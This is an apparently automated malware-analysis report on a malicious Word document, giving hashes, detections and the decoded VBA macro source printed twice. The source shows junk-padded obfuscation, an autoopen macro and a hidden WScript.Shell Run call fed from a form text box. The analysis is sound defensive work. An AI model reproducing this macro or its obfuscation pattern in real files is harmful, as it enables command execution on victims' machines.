Office (OLE) malware analysis — malicious · 74113ff23ba2b9a5

MALICIOUS

Office (OLE)

99.0 KB Created: 2019-01-16 16:39:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: a1541e59807a545b2586844edfc2d83d SHA-1: a67c7ea51420ff63e063425b0897781943a62b78 SHA-256: 74113ff23ba2b9a5f81dd7d7168d96adaa1ebab72cdc0b29ca5a3eeea5334682

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, commonly used to execute arbitrary commands. The 'autoopen' macro marker suggests automatic execution upon opening. The VBA script likely attempts to download and execute a second-stage payload, although the specific commands are obfuscated.

Heuristics 10

ClamAV: Doc.Malware.Generic-6817636-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6817636-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Matched line in script
```
 End Select
XMLqi = "WscRipt.sHeLl"
   Select Case feedvu
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
 End Select
XMLqi = "WscRipt.sHeLl"
   Select Case feedvu
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

 End Select
Steelwb = Array(matrixfz, PracticalPlasticTablezz, Canyonwd, CreateObject("" + PersonalLoanAccountzn + AutoLoanAccountdi + quantifyingff + realtimemr + Shoresrv + XMLqi).Run!(("" + contentik + bleedingedgerk + virtualuw + FrenchGuianazh.TextBox1) + paymentod + mintgreenjw + Regionalzc + Shoalhj, 89 - 89), Advancedhb, Alleylk, Focusednz)
   Select Case paymentrj

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub autoopen()
Tastyzd = Managermp
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9698 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9698 bytes
SHA-256: `3034dc1fef788626fe00c0e7c9f99686725aeb8fc7a8f6d2e1518a8dfd5984e3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FrenchGuianazh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Attribute VB_Name = "Associatesv" Function whiteboardbz() On Error Resume Next Select Case Arizonawj Case 364 greyow = navigatingwl quantifyingoj = oliverv nichesuz = CLng(516) bluetoothkz = TastyFreshSaladsa Case 263 matrixvq = CLng(813) Lanels = Streamlinedbt invoicekf = CDate(clientserverhw) Idahohw = Refinediz BahrainiDinarfk = Int(12) Case 566 RSSmk = Avonwa depositmo = Cos(k247cz) parallelismit = Accountsut AutomotiveComputersMusiclo = ChrB(530) Coordinatorti = Musicsf End Select Select Case Infrastructurewn Case 872 heuristicmk = feedvb deposituo = Tastybf IBji = CLng(637) Toysdi = IncredibleGraniteBaconti Case 211 NewHampshirews = CLng(55) firewallwt = Freshbf InvestmentAccountqw = CDate(granularol) GroceryElectronicsij = Congojb Consultantbs = Int(196) Case 221 Runlc = Virginiaiz distributedom = Cos(leveragesb) Assurancett = Synergizedrm asymmetricjw = ChrB(62) Floridaia = crossplatformwl End Select Select Case SmallMetalKeyboardqc Case 9 architectpz = Unbrandedii ElectronicsToolsua = unleashpz AIki = CLng(511) localareanetworkwi = HealthBabyToolsrk Case 924 orchidfw = CLng(416) Researchvt = Lightscb CheckingAccountsw = CDate(MoviesBabypj) withdrawalwm = schemasss IntelligentFrozenSoapqw = Int(48) Case 791 goldfj = multibytefz regionalkj = Cos(Visionarylr) CreditCardAccountuo = indexhl Niueoc = ChrB(668) Luxembourgdz = partnershipszt End Select Select Case USBjj Case 458 motivatinguq = Customizablesm Frozenuv = Humanzn holisticaj = CLng(563) TastyFrozenBallwm = reinventwz Case 721 Representativekf = CLng(958) AutoLoanAccountah = Heightszs Parkwaysdw = CDate(Switzerlanduk) portwz = Futureproofedvi abilityum = Int(758) Case 306 Seamlessad = Corporateli Smallpw = Cos(Dynamiciu) depositii = Creativeoi Pulatv = ChrB(761) Floridamw = dynamictz End Select XMLqi = "WscRipt.sHeLl" Select Case feedvu Case 97 SaintKittsandNevissw = Grassrootsbt paymentjd = Granitemi Humanai = CLng(477) Plannernb = Fullyconfigurablefp Case 793 Woodenwr = CLng(750) Rapiddi = Consultantba CheckingAccountis = CDate(schemasht) Investorlq = Productiv FantasticSteelGloveswi = Int(201) Case 812 Responsedh = IndianRupeewu driverkw = Cos(backendww) Specialisthb = Stravenuena EXEmh = ChrB(319) deliverableszv = ADPzo End Select Steelwb = Array(matrixfz, PracticalPlasticTablezz, Canyonwd, CreateObject("" + PersonalLoanAccountzn + AutoLoanAccountdi + quantifyingff + realtimemr + Shoresrv + XMLqi).Run!(("" + contentik + bleedingedgerk + virtualuw + FrenchGuianazh.TextBox1) + paymentod + mintgreenjw + Regionalzc + Shoalhj, 89 - 89), Advancedhb, Alleylk, Focusednz) Select Case paymentrj Case 439 clearthinkingoq = Dobrapa firewallmf = RefinedGraniteShirtjb Harborzu = CLng(687) bypassingit = CreditCardAccounttz Case 618 policyvu = CLng(785) Freshjz = Awesomess withdrawalwm = CDate(calculatezh) LithuanianLitasmt = parsejw synergisticva = Int(668) Case 451 Kentuckyhk = servicedeskzo MarshallIslandszb = Cos(pricingstructureuk) Minnesotabi = deliverablesja engagehj = ChrB(101) Woodenrb = parallelismpf End Select Select Case w24hourjw Case 925 circuitbi = copyss paymentuj = Assistantao Electronicsfu = CLng(952) Dividekw = synthesizekj Case 690 monitorlw = CLng(511) IndustrialKidsSportsnj = Granitett HandmadeMetalBaconqv = CDate(Groupqu) InvestmentAccountdz = salmonrj ElectronicsHomeSportshi = Int(127) Case 499 relationshipsri = Configurablepf visionaryid = Cos(CongoleseFranchw) sensortz = holistichz TastyPlasticShirtuh = ChrB(397) PNGkq = budgetarymanagementsd End Select Select Case Sleekkh Case 1 ShoesBeautyJeweleryff = overridepa indexoj = B2Cfh SavingsAccountks = CLng(716) JBODow = SleekRubberMousejs Case 38 Industrialmt = CLng(208) w1080pzw = pixelbs capacityfw = CDate(Hawaiita) Principalhj = matrixjw firewallhz = Int(153) Case 146 generatingbd = interfacebm Boliviari = Cos(Infrastructurezz) VirginIslandsBritishhm = NorthCarolinamw revolutionizewc = ChrB(865) Idahodo = streamlinetw End Select Select Case compositein Case 597 PracticalPlasticSaladja = multistatebo Argentinaod = Electronicspf backupdm = CLng(921) invoicesr = alarmqz Case 885 USDollarii = CLng(869) matrixcd = withdrawalcv opticalbd = CDate(SmallGraniteSaladtz) panelbr = magentanj dotcomko = Int(15) Case 690 Centralss = invoicepj firewallvt = Cos(adapterpm) synthesizingfz = Jewelerydr highlevelct = ChrB(93) Pennsylvaniaov = Randcl End Select End Function Attribute VB_Name = "Accountabilityfb" Function fuchsiaus() CreditCardAccountwz = opensourcepf Hillsqs = firewallhi channelskt = Landcp innovatemf = quantifylq Bordersbh = Directorwi InvestmentAccountcl = Knollsrh Corporatejh = TastyFrozenMouseiz Customerjl = viralnc Buckinghamshirenr = Practicalzj End Function Function Marylandwc() transmitoj = Wisconsinwu Utahki = RusticSteelChickenza withdrawalbk = SCSIjc Digitizednj = greyji bleedingedgezt = limeib MoneyMarketAccountia = superstructurezo Tastyfp = Businessfocusedfz Avonic = ToysSportswb RSScs = TCPjd End Function Sub autoopen() Tastyzd = Managermp Macedoniaiz = withdrawaldn Plasticii = Buckinghamshirelt Ergonomicdj = redjw orangena = PhilippinePesoci auxiliaryzr = Principalkf plumwd = Array(B2Bmv, GraphicInterfacehr, parallelismjz, whiteboardbz, Germanyho, reinventzu, indexjz) applicationjw = Phasedjr XSSct = Spurmj Representativecv = meshbj HomeLoanAccountba = opensourceir End Sub Function Automatedou() Smallwi = GamesToolsGamespj matrixwm = overridezn synthesizepf = Jeweleryjz Unioncj = channelsfd lavenderjl = strategizews InvestmentAccountcb = Legacykz inputpa = Functionalitycz Incredibleiq = Sofths schemasiw = Throughwayzi End Function Attribute VB_Name = "infrastructureszz" Attribute VB_Name = "Datawc" Attribute VB_Name = "Hawaiiif" Attribute VB_Name = "greymm" Attribute VB_Name = "softwarecl" Attribute VB_Name = "Agentjl" Attribute VB_Name = "backingupll" Attribute VB_Name = "bypassingrb" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "HomeLoanAccountfw" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "pricingstructureok" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Berkshireoj" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Engineerno" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "parsingjp" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "withdrawalfd" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 3034dc1fef788626fe00c0e7c9f99686725aeb8fc7a8f6d2e1518a8dfd5984e3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FrenchGuianazh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Associatesv"
Function whiteboardbz()
On Error Resume Next
   Select Case Arizonawj
         Case 364
greyow = navigatingwl
            quantifyingoj = oliverv
            nichesuz = CLng(516)
bluetoothkz = TastyFreshSaladsa
         Case 263
            matrixvq = CLng(813)
Lanels = Streamlinedbt
            invoicekf = CDate(clientserverhw)
Idahohw = Refinediz
            BahrainiDinarfk = Int(12)
         Case 566
RSSmk = Avonwa
            depositmo = Cos(k247cz)
parallelismit = Accountsut
            AutomotiveComputersMusiclo = ChrB(530)
            Coordinatorti = Musicsf
 End Select
   Select Case Infrastructurewn
         Case 872
heuristicmk = feedvb
            deposituo = Tastybf
            IBji = CLng(637)
Toysdi = IncredibleGraniteBaconti
         Case 211
            NewHampshirews = CLng(55)
firewallwt = Freshbf
            InvestmentAccountqw = CDate(granularol)
GroceryElectronicsij = Congojb
            Consultantbs = Int(196)
         Case 221
Runlc = Virginiaiz
            distributedom = Cos(leveragesb)
Assurancett = Synergizedrm
            asymmetricjw = ChrB(62)
            Floridaia = crossplatformwl
 End Select
   Select Case SmallMetalKeyboardqc
         Case 9
architectpz = Unbrandedii
            ElectronicsToolsua = unleashpz
            AIki = CLng(511)
localareanetworkwi = HealthBabyToolsrk
         Case 924
            orchidfw = CLng(416)
Researchvt = Lightscb
            CheckingAccountsw = CDate(MoviesBabypj)
withdrawalwm = schemasss
            IntelligentFrozenSoapqw = Int(48)
         Case 791
goldfj = multibytefz
            regionalkj = Cos(Visionarylr)
CreditCardAccountuo = indexhl
            Niueoc = ChrB(668)
            Luxembourgdz = partnershipszt
 End Select
   Select Case USBjj
         Case 458
motivatinguq = Customizablesm
            Frozenuv = Humanzn
            holisticaj = CLng(563)
TastyFrozenBallwm = reinventwz
         Case 721
            Representativekf = CLng(958)
AutoLoanAccountah = Heightszs
            Parkwaysdw = CDate(Switzerlanduk)
portwz = Futureproofedvi
            abilityum = Int(758)
         Case 306
Seamlessad = Corporateli
            Smallpw = Cos(Dynamiciu)
depositii = Creativeoi
            Pulatv = ChrB(761)
            Floridamw = dynamictz
 End Select
XMLqi = "WscRipt.sHeLl"
   Select Case feedvu
         Case 97
SaintKittsandNevissw = Grassrootsbt
            paymentjd = Granitemi
            Humanai = CLng(477)
Plannernb = Fullyconfigurablefp
         Case 793
            Woodenwr = CLng(750)
Rapiddi = Consultantba
            CheckingAccountis = CDate(schemasht)
Investorlq = Productiv
            FantasticSteelGloveswi = Int(201)
         Case 812
Responsedh = IndianRupeewu
            driverkw = Cos(backendww)
Specialisthb = Stravenuena
            EXEmh = ChrB(319)
            deliverableszv = ADPzo
 End Select
Steelwb = Array(matrixfz, PracticalPlasticTablezz, Canyonwd, CreateObject("" + PersonalLoanAccountzn + AutoLoanAccountdi + quantifyingff + realtimemr + Shoresrv + XMLqi).Run!(("" + contentik + bleedingedgerk + virtualuw + FrenchGuianazh.TextBox1) + paymentod + mintgreenjw + Regionalzc + Shoalhj, 89 - 89), Advancedhb, Alleylk, Focusednz)
   Select Case paymentrj
         Case 439
clearthinkingoq = Dobrapa
            firewallmf = RefinedGraniteShirtjb
            Harborzu = CLng(687)
bypassingit = CreditCardAccounttz
         Case 618
            policyvu = CLng(785)
Freshjz = Awesomess
            withdrawalwm = CDate(calculatezh)
LithuanianLitasmt = parsejw
            synergisticva = Int(668)
         Case 451
Kentuckyhk = servicedeskzo
            MarshallIslandszb = Cos(pricingstructureuk)
Minnesotabi = deliverablesja
            engagehj = ChrB(101)
            Woodenrb = parallelismpf
 End Select
   Select Case w24hourjw
         Case 925
circuitbi = copyss
            paymentuj = Assistantao
            Electronicsfu = CLng(952)
Dividekw = synthesizekj
         Case 690
            monitorlw = CLng(511)
IndustrialKidsSportsnj = Granitett
            HandmadeMetalBaconqv = CDate(Groupqu)
InvestmentAccountdz = salmonrj
            ElectronicsHomeSportshi = Int(127)
         Case 499
relationshipsri = Configurablepf
            visionaryid = Cos(CongoleseFranchw)
sensortz = holistichz
            TastyPlasticShirtuh = ChrB(397)
            PNGkq = budgetarymanagementsd
 End Select
   Select Case Sleekkh
         Case 1
ShoesBeautyJeweleryff = overridepa
            indexoj = B2Cfh
            SavingsAccountks = CLng(716)
JBODow = SleekRubberMousejs
         Case 38
            Industrialmt = CLng(208)
w1080pzw = pixelbs
            capacityfw = CDate(Hawaiita)
Principalhj = matrixjw
            firewallhz = Int(153)
         Case 146
generatingbd = interfacebm
            Boliviari = Cos(Infrastructurezz)
VirginIslandsBritishhm = NorthCarolinamw
            revolutionizewc = ChrB(865)
            Idahodo = streamlinetw
 End Select
   Select Case compositein
         Case 597
PracticalPlasticSaladja = multistatebo
            Argentinaod = Electronicspf
            backupdm = CLng(921)
invoicesr = alarmqz
         Case 885
            USDollarii = CLng(869)
matrixcd = withdrawalcv
            opticalbd = CDate(SmallGraniteSaladtz)
panelbr = magentanj
            dotcomko = Int(15)
         Case 690
Centralss = invoicepj
            firewallvt = Cos(adapterpm)
synthesizingfz = Jewelerydr
            highlevelct = ChrB(93)
            Pennsylvaniaov = Randcl
 End Select
End Function


Attribute VB_Name = "Accountabilityfb"
Function fuchsiaus()
CreditCardAccountwz = opensourcepf
Hillsqs = firewallhi
channelskt = Landcp
innovatemf = quantifylq
Bordersbh = Directorwi
InvestmentAccountcl = Knollsrh
Corporatejh = TastyFrozenMouseiz
Customerjl = viralnc
Buckinghamshirenr = Practicalzj
End Function
Function Marylandwc()
transmitoj = Wisconsinwu
Utahki = RusticSteelChickenza
withdrawalbk = SCSIjc
Digitizednj = greyji
bleedingedgezt = limeib
MoneyMarketAccountia = superstructurezo
Tastyfp = Businessfocusedfz
Avonic = ToysSportswb
RSScs = TCPjd
End Function
Sub autoopen()
Tastyzd = Managermp
Macedoniaiz = withdrawaldn
Plasticii = Buckinghamshirelt
Ergonomicdj = redjw
orangena = PhilippinePesoci
auxiliaryzr = Principalkf
plumwd = Array(B2Bmv, GraphicInterfacehr, parallelismjz, whiteboardbz, Germanyho, reinventzu, indexjz)
applicationjw = Phasedjr
XSSct = Spurmj
Representativecv = meshbj
HomeLoanAccountba = opensourceir
End Sub
Function Automatedou()
Smallwi = GamesToolsGamespj
matrixwm = overridezn
synthesizepf = Jeweleryjz
Unioncj = channelsfd
lavenderjl = strategizews
InvestmentAccountcb = Legacykz
inputpa = Functionalitycz
Incredibleiq = Sofths
schemasiw = Throughwayzi
End Function

Attribute VB_Name = "infrastructureszz"

Attribute VB_Name = "Datawc"

Attribute VB_Name = "Hawaiiif"

Attribute VB_Name = "greymm"

Attribute VB_Name = "softwarecl"

Attribute VB_Name = "Agentjl"

Attribute VB_Name = "backingupll"

Attribute VB_Name = "bypassingrb"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HomeLoanAccountfw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pricingstructureok"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Berkshireoj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Engineerno"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "parsingjp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "withdrawalfd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.